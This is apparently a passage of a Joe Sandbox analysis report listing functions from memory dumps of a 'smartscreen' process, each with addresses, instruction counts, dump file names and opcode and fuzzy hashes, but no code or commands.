                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ca90b2b924295870ea0c2fd029a6dacf1a97d6915b3656f8d7d7f0030e9859dd
                                                                                                      • Instruction ID: fddacf827fb3e65a0c5d14815b52f038dafedb2bef837724cf6cb8d925cc0a82
                                                                                                      • Opcode Fuzzy Hash: ca90b2b924295870ea0c2fd029a6dacf1a97d6915b3656f8d7d7f0030e9859dd
                                                                                                      • Instruction Fuzzy Hash: 163152B0E0A51D9FEF78EB84C8656FCB7B1EF58301F1501BAD049932A5DE346A818F41
                                                                                                      Function 00007FFD9B880C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 88a214a86404161cc74fbd5ab3d4de2c6eb1b4efab727c94587711ae4509ddfb
                                                                                                      • Instruction ID: 0c2acf294a5b48935dead19197ef01c463629d5fe1cbf39c7a3ab01be7d45ac5
                                                                                                      • Opcode Fuzzy Hash: 88a214a86404161cc74fbd5ab3d4de2c6eb1b4efab727c94587711ae4509ddfb
                                                                                                      • Instruction Fuzzy Hash: E5214F36B0EA8D8FE7229BA8DC211ED7B71EF86711F0545B3C164DB1E2D638260AC751
                                                                                                      Function 00007FFD9B8835FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6cb9367d7b3476dd05333bdfd122a63528819be0f816ab3fce78803c1ec439bd
                                                                                                      • Instruction ID: 47ef93b5d946333080f9195fe36fb888344a6ea34b856d2d41c709df80225057
                                                                                                      • Opcode Fuzzy Hash: 6cb9367d7b3476dd05333bdfd122a63528819be0f816ab3fce78803c1ec439bd
                                                                                                      • Instruction Fuzzy Hash: 7B31BB31E0891C9FCF98DF14C895AE973F0FB69301F5011EA900EE3265CA75AA84CF42
                                                                                                      Function 00007FFD9B8836E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f86dc2950631d27388561a2dcbb06dad3e51ee9ece1024c00ce0f730ccde821b
                                                                                                      • Instruction ID: 2b6f92d3d4794b85db195ff6efe97d5a8eba2e348e66907088732798f6a8d8fe
                                                                                                      • Opcode Fuzzy Hash: f86dc2950631d27388561a2dcbb06dad3e51ee9ece1024c00ce0f730ccde821b
                                                                                                      • Instruction Fuzzy Hash: B9319C31E0891C9FDF98DF14C895AE973F1FB69301F5041EA900EE3265DA75AA80CF42
                                                                                                      Function 00007FFD9B8811A2 Relevance: .1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eeaa1013e20cf013313f3b387f4b18152b28ade620f736f3db8652c798b52fe6
                                                                                                      • Instruction ID: e19c663659b5409fd81f622007c5acb21343ea5ee70112249a2c90c0c98f21b9
                                                                                                      • Opcode Fuzzy Hash: eeaa1013e20cf013313f3b387f4b18152b28ade620f736f3db8652c798b52fe6
                                                                                                      • Instruction Fuzzy Hash: 8621FA30A1891E8FEB94EFA8D8949ADB7F1FF6C301B11457AD419D32A5DF34A981CB40
                                                                                                      Function 00007FFD9B880C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eb4d48c491b533d74db6de6f8d54107d53e46df4ebf7a1529c11e4f8f1efad8c
                                                                                                      • Instruction ID: 42d337e5ff08655db50009f75631f9f97785db2edc46b3e61d3c1110cc7502be
                                                                                                      • Opcode Fuzzy Hash: eb4d48c491b533d74db6de6f8d54107d53e46df4ebf7a1529c11e4f8f1efad8c
                                                                                                      • Instruction Fuzzy Hash: 3F113835B1EA8E8FE7129F68CC212E97771EF86710F064573C060DB1E2DA38260A8791
                                                                                                      Function 00007FFD9B88FD6B Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f8b6ae3ad24332bbb026019806cbf0794783315bff4430669a178435eece9a3
                                                                                                      • Instruction ID: 4d5ca6a345c7a09979e50b0ee47202fdf13e40a99ae39632ab70ba95c0054f3a
                                                                                                      • Opcode Fuzzy Hash: 2f8b6ae3ad24332bbb026019806cbf0794783315bff4430669a178435eece9a3
                                                                                                      • Instruction Fuzzy Hash: B2119D30A09A1D8FDFA9DB58C895AA8B3B5FF58301F5141E9D01DE7651CB35AE81CF40
                                                                                                      Function 00007FFD9B8D60E9 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 46f3994b8c19a29384bbada443d1274c8e850685ff4dcd0b1964119e45f1b167
                                                                                                      • Instruction ID: 9c64407ec845e9230c4e97af2999624254b01d7d7a191d9ed23b9c0d63664cbe
                                                                                                      • Opcode Fuzzy Hash: 46f3994b8c19a29384bbada443d1274c8e850685ff4dcd0b1964119e45f1b167
                                                                                                      • Instruction Fuzzy Hash: 9021DEB0E0961D9FEFA8DB9884657B877A1FB5C311F1143BBD00DE2292DE346A818B41
                                                                                                      Function 00007FFD9B8D9938 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ce6e0119060710ed7c0260c98ed32f7b073f50435e04f69232e9042cff07110
                                                                                                      • Instruction ID: 2de567669d28318ae0773660bb57c751db1a6ca920c85bace966911e8c1aaedd
                                                                                                      • Opcode Fuzzy Hash: 4ce6e0119060710ed7c0260c98ed32f7b073f50435e04f69232e9042cff07110
                                                                                                      • Instruction Fuzzy Hash: 3D114931F0951DDBDB28EB98D8986ECB7B1FB98314F11067BC019D32A6DE3469018B40
                                                                                                      Function 00007FFD9B880C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a1d57f6ecec417d26d2e86b27de59abf21e78be0bfba9e32efab9c3537e08a74
                                                                                                      • Instruction ID: ade94aabd71d86a7e39d6c3de2023b30fde20e6686bb971aa4b745a23ed6e490
                                                                                                      • Opcode Fuzzy Hash: a1d57f6ecec417d26d2e86b27de59abf21e78be0bfba9e32efab9c3537e08a74
                                                                                                      • Instruction Fuzzy Hash: 4E110635E1EA9E8FE7129F64CC212E97B71EF46710F0645B3C061DB1E2CA386609C791
                                                                                                      Function 00007FFD9B88FDE5 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2454a2a403851f4d5748c789541082e05e590de1f090baff668b4e9a160082c1
                                                                                                      • Instruction ID: 251ac682025014e03c6eb3dc909ae8d6f02505493e487ea79f45facc9f61802e
                                                                                                      • Opcode Fuzzy Hash: 2454a2a403851f4d5748c789541082e05e590de1f090baff668b4e9a160082c1
                                                                                                      • Instruction Fuzzy Hash: DE21BB30A09A1D8FCFA9DB18C895AA8B3B5FF58301F5141E9E01DD76A1CB34AA81CF40
                                                                                                      Function 00007FFD9B8D5459 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 80b76d3345c47c1a99d5483515adab295f5e6128b297297f1d231252ac5c94fe
                                                                                                      • Instruction ID: 5a011d3bbbe4e9ad04fd537250e3f728d241a092a15d6c42ef43914e69ea977c
                                                                                                      • Opcode Fuzzy Hash: 80b76d3345c47c1a99d5483515adab295f5e6128b297297f1d231252ac5c94fe
                                                                                                      • Instruction Fuzzy Hash: 3A115A70908A8D8FDF85EF68C899AE97BF0FF28301F0102ABD818D31A1DB349544CB81
                                                                                                      Function 00007FFD9B89783D Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea867b1ad5bf8d1763fbad644c7b38660b0dfba5d97436edec88bc2a56be795e
                                                                                                      • Instruction ID: d4b5949b493ad288d92fd16b904a1577821ad5a858090608dfd027c41421a7d1
                                                                                                      • Opcode Fuzzy Hash: ea867b1ad5bf8d1763fbad644c7b38660b0dfba5d97436edec88bc2a56be795e
                                                                                                      • Instruction Fuzzy Hash: A4014921E0E50D5FEB119B94D8212FD7FA4EF8A314F420272E008D22D6DF385105C781
                                                                                                      Function 00007FFD9B880C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de5727294e6bf23bcdef37d96830c8e8bc45e50333cdf4139ae54ecb2bc6e830
                                                                                                      • Instruction ID: b52885abce043745989a6b9127e06d4817ab884dcd761fe354d876d5ff3a79d5
                                                                                                      • Opcode Fuzzy Hash: de5727294e6bf23bcdef37d96830c8e8bc45e50333cdf4139ae54ecb2bc6e830
                                                                                                      • Instruction Fuzzy Hash: 2411E571E0E68E8FE7129F64CC211A97B71EF46700F0545B3D061DB1E2DA386619C791
                                                                                                      Function 00007FFD9B89F8B9 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0cb2a8e0551438ef2f81278b5fdc4d57dcec83fff195b7fc395140f3ad594744
                                                                                                      • Instruction ID: e712ead1aed95e022d18997c2b9309de66e74047e9d369ea4abeecd00ccea7ee
                                                                                                      • Opcode Fuzzy Hash: 0cb2a8e0551438ef2f81278b5fdc4d57dcec83fff195b7fc395140f3ad594744
                                                                                                      • Instruction Fuzzy Hash: F4112E3090968D8FDF85EF68C859AE97FF0FF29300F0501AAD458D71A1DB34A554CB81
                                                                                                      Function 00007FFD9B8D5539 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e5f947c7d7952ff29004dcde9cccc2678e38c08305c67090c758f9a658e80f24
                                                                                                      • Instruction ID: 87f7bf09fd7b0dbeb0e79b1449ae85450496cbe6a8c3b18f064f993d2f43371b
                                                                                                      • Opcode Fuzzy Hash: e5f947c7d7952ff29004dcde9cccc2678e38c08305c67090c758f9a658e80f24
                                                                                                      • Instruction Fuzzy Hash: 01110370908A8D8FCB85EF68C858AE97BF0FF69301F0502ABE408D72A1D734D594CB81
                                                                                                      Function 00007FFD9B897FE1 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f66fcbddf926fea8ff7c002ab06eaab1409fcaa0231ede2bf89c167f778a2d7e
                                                                                                      • Instruction ID: fe899756287dd30ccb97d1e20a28c9d086d1d3087c249cf2c87733499590d13d
                                                                                                      • Opcode Fuzzy Hash: f66fcbddf926fea8ff7c002ab06eaab1409fcaa0231ede2bf89c167f778a2d7e
                                                                                                      • Instruction Fuzzy Hash: 16015634A1968D8FCF85EF18C892AD93BF0FF18344F0601AAE888C7261C734E951CB81
                                                                                                      Function 00007FFD9B8D5D19 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ce011a26a64d77917425b3f590f8d733fb2a19e5539cb1ff34173390797290f
                                                                                                      • Instruction ID: 432441c256f716d5b27da0d373946c506e22604a8a381a1b9aac31025694259c
                                                                                                      • Opcode Fuzzy Hash: 0ce011a26a64d77917425b3f590f8d733fb2a19e5539cb1ff34173390797290f
                                                                                                      • Instruction Fuzzy Hash: 38014C30909A4D8FDF95EF68C859AEA7BF0FF69300F0506ABD418C71A2DB759554CB80
                                                                                                      Function 00007FFD9B88EB8B Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac6cf462e478ccc57c781ae994bedadb07cd439df8696de8401a3268b17f2f8d
                                                                                                      • Instruction ID: c11588fc3878e7ac8f349fdf49aa4fd6059e22207ad96d83b4f5a50c0fc1863c
                                                                                                      • Opcode Fuzzy Hash: ac6cf462e478ccc57c781ae994bedadb07cd439df8696de8401a3268b17f2f8d
                                                                                                      • Instruction Fuzzy Hash: 3C01B13195FBCD5FE752ABB448650E83FA0EF0A215F0641FAE459D70B3DA38564A8301
                                                                                                      Function 00007FFD9B8CC9C9 Relevance: .0, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 181afbf863999027eb5fcc6fa264da3a1e6f2d2f378bce64827ef12e926ef78f
                                                                                                      • Instruction ID: 3ebaf57a84ffd7a654b9d337433b9a74d85c17ca2df1ff4f5bb7c705b4b7992c
                                                                                                      • Opcode Fuzzy Hash: 181afbf863999027eb5fcc6fa264da3a1e6f2d2f378bce64827ef12e926ef78f
                                                                                                      • Instruction Fuzzy Hash: 6501407090968C8FCB45DF68C8599D97FB0FF59304F05419BE449C71A2DB349994CB81
                                                                                                      Function 00007FFD9B8D23D9 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 243b3e159c95310ef3958bfc9a9fdfa26dd684b8908689b3359a47f43195a2a5
                                                                                                      • Instruction ID: 6ada5915d43ede09fa036546091e9cd0f061ffb0402e826aa61d788c0539b28f
                                                                                                      • Opcode Fuzzy Hash: 243b3e159c95310ef3958bfc9a9fdfa26dd684b8908689b3359a47f43195a2a5
                                                                                                      • Instruction Fuzzy Hash: 41015E3090968D8FCF85DF68C854AAA7BF0FF69300F0506ABD418C71A2DB74DA54CB81
                                                                                                      Function 00007FFD9B8CBD59 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 502cf25d093cb36f9a992dd50b8682ff2fd5322d2268deeaf7384070e64a8aca
                                                                                                      • Instruction ID: f16454369e0bf579c7baef099340477bf9a21b3ec0ea3611068f4a4ce5ac6fc3
                                                                                                      • Opcode Fuzzy Hash: 502cf25d093cb36f9a992dd50b8682ff2fd5322d2268deeaf7384070e64a8aca
                                                                                                      • Instruction Fuzzy Hash: 06012970909A8C8FCB55EF18C8A9AA97FF0FF69304F0501AAE448C71A1DB359954CB81
                                                                                                      Function 00007FFD9B8D5550 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53885ab9d0abe896ee6f3c1d4591d8fa13df5ed65f0d8a13ba9e491dc4c408d7
                                                                                                      • Instruction ID: de7da3a3010fdabd1e815e78abacd2883bb13ce35fed474baccab8e394b22dcd
                                                                                                      • Opcode Fuzzy Hash: 53885ab9d0abe896ee6f3c1d4591d8fa13df5ed65f0d8a13ba9e491dc4c408d7
                                                                                                      • Instruction Fuzzy Hash: 2E01A870914A4D9FDF84EF68C849AEE7BF1FB68305F00066AA81DD3264DB71E594CB81
                                                                                                      Function 00007FFD9B8D5470 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8111b4e6c69d9ef0835ee93b53919b992fcc80ff01bd4c0e829f9d00b694ed0
                                                                                                      • Instruction ID: 6029cd65010a7465cb1279e485607a6447a8d016b521e206a8bb3854c97a13e3
                                                                                                      • Opcode Fuzzy Hash: b8111b4e6c69d9ef0835ee93b53919b992fcc80ff01bd4c0e829f9d00b694ed0
                                                                                                      • Instruction Fuzzy Hash: A801AC70914A4D9FDF84EF58C849AEE77F0FB68305F00056AA81DD3264DB71E594CB81
                                                                                                      Function 00007FFD9B8D2CB0 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b86cc84e5cbb9ffde3f870861366155830a36f29b7821bca0e05adfaa55ad226
                                                                                                      • Instruction ID: a0ddca17bff9aafa4c391bd10c3af94cdfcb373bd6c9da03f070fd4f97aad54e
                                                                                                      • Opcode Fuzzy Hash: b86cc84e5cbb9ffde3f870861366155830a36f29b7821bca0e05adfaa55ad226
                                                                                                      • Instruction Fuzzy Hash: 0C01A42094F3C95FDB539BB488745D47FF0EF47204F0942EBD488CA0A7D928454AC312
                                                                                                      Function 00007FFD9B8A1A98 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 783d15f1f26367b484ed379e9198a91eeda5147e6d1e86b9d4a9dafeb4566d89
                                                                                                      • Instruction ID: 09abb967aaae5524fd00c63b92eac104cf018201042055c4cb1a6381b5040af1
                                                                                                      • Opcode Fuzzy Hash: 783d15f1f26367b484ed379e9198a91eeda5147e6d1e86b9d4a9dafeb4566d89
                                                                                                      • Instruction Fuzzy Hash: 1201DA70914A1D8FDF84EF68C859AEE77F0FB28305F00056AA81DD32A0DB34A594CB81
                                                                                                      Function 00007FFD9B89F8D0 Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f527b20f58bb282b0465b90016b5fa407ac5fcd18bd4db2d160624c0b3fca679
                                                                                                      • Instruction ID: ccffe6ef7a5cdd83df08dcf4dae818c2ccf4042fb20efd5720dcee465117e095
                                                                                                      • Opcode Fuzzy Hash: f527b20f58bb282b0465b90016b5fa407ac5fcd18bd4db2d160624c0b3fca679
                                                                                                      • Instruction Fuzzy Hash: 5101A870914A4D8FDF84EF58C889AEE7BF0FB68305F10056AA81DD3264DB30A594CB81
                                                                                                      Function 00007FFD9B8D1F09 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5cef049d3aa53114bd7fb7f03ebb75275271c7e005416ef69e0a2b8274c84942
                                                                                                      • Instruction ID: 4ec48fbb917c1f518762fbe528930a37286b0e432181255fda8398860ca7f8d1
                                                                                                      • Opcode Fuzzy Hash: 5cef049d3aa53114bd7fb7f03ebb75275271c7e005416ef69e0a2b8274c84942
                                                                                                      • Instruction Fuzzy Hash: 8C014F3090968D8FCB86DF64C8A5AD97FB0FF59300F0541DBD408D71A2DB759994CB41
                                                                                                      Function 00007FFD9B8D9CF9 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
